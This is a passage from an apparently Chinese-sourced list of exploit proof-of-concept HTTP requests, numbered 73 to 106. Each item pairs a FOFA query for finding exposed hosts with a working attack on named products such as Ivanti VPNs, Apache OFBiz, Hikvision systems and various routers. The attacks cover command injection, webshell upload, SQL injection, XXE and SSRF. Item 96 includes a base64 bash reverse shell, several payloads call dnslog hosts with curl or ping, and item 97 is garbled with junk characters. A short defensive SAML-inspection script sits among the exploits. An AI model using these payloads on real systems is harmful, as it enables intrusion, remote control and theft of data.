POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 577

PAYLOAD

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (the name matches the filename sent above) to confirm it was written:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3IDA%2BJjE%3D}|{base64,-d}|{bash,-i}'.execute();

The base64 is the command "bash -i >& /dev/tcp/192.168.40.128/7777 0>&1" (192.168.40.128 being the listener host). Because the body is form-urlencoded, the "+" and "=" characters inside the base64 are sent as %2B and %3D; a bare "+" would be decoded to a space and break the base64 before it reaches the shell.

97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行% r, _; Q$ ~/ |9 w: c% m
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
) o) J' u  _  }! B/ \; RGET /passport/login/ HTTP/1.1
' y7 Y& A5 S' K% j6 v/ R; [4 ZHost: 192.168.40.130:8085
# [) y; H  N  @' l" LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& s/ W: R. @0 i0 oAccept-Encoding: gzip
" C8 f  c. u* @& UConnection: close
  u$ I4 S& o7 W& w' tCookie: rememberMe=PAYLOAD/ o% T, S0 v2 m( \' L% E( J, h8 k
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
  W& t# n/ p9 h% z) d+ ]( `
" Y: g0 a% g3 Y3 R" a; t: p+ P8 o
98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

The ds:RetrievalMethod URI is fetched by the appliance while it processes the signature; a DNS or HTTP callback on the URI host confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (an external parameter entity that makes the parser call out to the DNS log host):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


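A defensive check for the two SAML endpoints above (items 102 and 103), added here as an example; it is not part of the original article and not code from Ivanti. It decodes a SAMLRequest/SAMLResponse parameter (plain base64 for the HTTP-POST binding, base64 of raw DEFLATE for the HTTP-Redirect binding) and flags the two things a legitimate SAML message never carries: a DTD or entity declaration (the XXE in item 103) and a ds:RetrievalMethod or xi:include pointing at an external URI (the SSRF in item 102). The SAMLRequest value is the one from the POC above; the SOAP body and the benign AuthnRequest are constructed samples with placeholder hostnames.

```python
import base64
import re
import zlib
from urllib.parse import quote, unquote

# A DTD or entity declaration has no place in a SAML message (item 103's XXE).
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
# ds:RetrievalMethod / xi:include that pulls key material or XML from an
# external URI (item 102's SSRF); only remote schemes are of interest.
REMOTE_URI_RE = re.compile(
    rb"<(?:[\w-]+:)?(?:RetrievalMethod|include)\b[^>]*?\b(?:URI|href)\s*=\s*"
    rb"[\"'](https?|ftp|file|gopher|jar)://",
    re.IGNORECASE,
)

def decode_saml_param(value: str) -> bytes:
    """Return the XML carried by a SAMLRequest/SAMLResponse parameter value."""
    # unquote (not unquote_plus): a literal '+' inside the base64 must survive.
    raw = base64.b64decode(unquote(value))
    if raw.startswith(b"<"):
        return raw                          # HTTP-POST binding: base64(xml)
    try:
        return zlib.decompress(raw, -15)    # HTTP-Redirect binding: base64(raw-deflate(xml))
    except zlib.error:
        return raw

def inspect_saml_xml(xml: bytes) -> list:
    """Rule ids that fire on one decoded SAML/XMLDSig document."""
    findings = []
    if DTD_RE.search(xml):
        findings.append("dtd-declaration")
    m = REMOTE_URI_RE.search(xml)
    if m:
        findings.append("remote-uri:" + m.group(1).decode().lower())
    return findings

def inspect_form_body(body: str) -> dict:
    """Findings per SAML parameter found in an x-www-form-urlencoded body."""
    results = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if name in ("SAMLRequest", "SAMLResponse"):
            results[name] = inspect_saml_xml(decode_saml_param(value))
    return results

# The SAMLRequest value from the item 103 POC above.
XXE_SAMLREQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

# Constructed sample modelled on item 102's saml20.ws body (hostname is a placeholder).
SOAP_KEYINFO_SSRF = (
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    b'<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:KeyInfo>'
    b'<ds:RetrievalMethod URI="http://attacker.example.test/x"/><ds:X509Data/>'
    b'</ds:KeyInfo></ds:Signature></soap:Body></soap:Envelope>'
)

# Constructed benign AuthnRequest, sent the way a real SP does over the Redirect binding.
BENIGN_AUTHN_REQUEST = (
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_c0ffee" '
    b'Version="2.0" IssueInstant="2024-01-31T00:00:00Z" '
    b'AssertionConsumerServiceURL="https://sp.example.test/acs"/>'
)

def benign_redirect_body() -> str:
    """base64(raw-deflate(xml)), percent-encoded, as the HTTP-Redirect binding sends it."""
    comp = zlib.compressobj(wbits=-15)
    deflated = comp.compress(BENIGN_AUTHN_REQUEST) + comp.flush()
    return "SAMLRequest=" + quote(base64.b64encode(deflated).decode(), safe="")

if __name__ == "__main__":
    print(inspect_form_body("SAMLRequest=" + XXE_SAMLREQUEST))
    print(inspect_saml_xml(SOAP_KEYINFO_SSRF))
    print(inspect_form_body(benign_redirect_body()))
```

Run against request bodies captured at a reverse proxy in front of /dana-na/auth/saml-sso.cgi and /dana-ws/saml20.ws; any non-empty finding list is a reason to drop the request, since neither feature is used by legitimate SAML peers.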
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
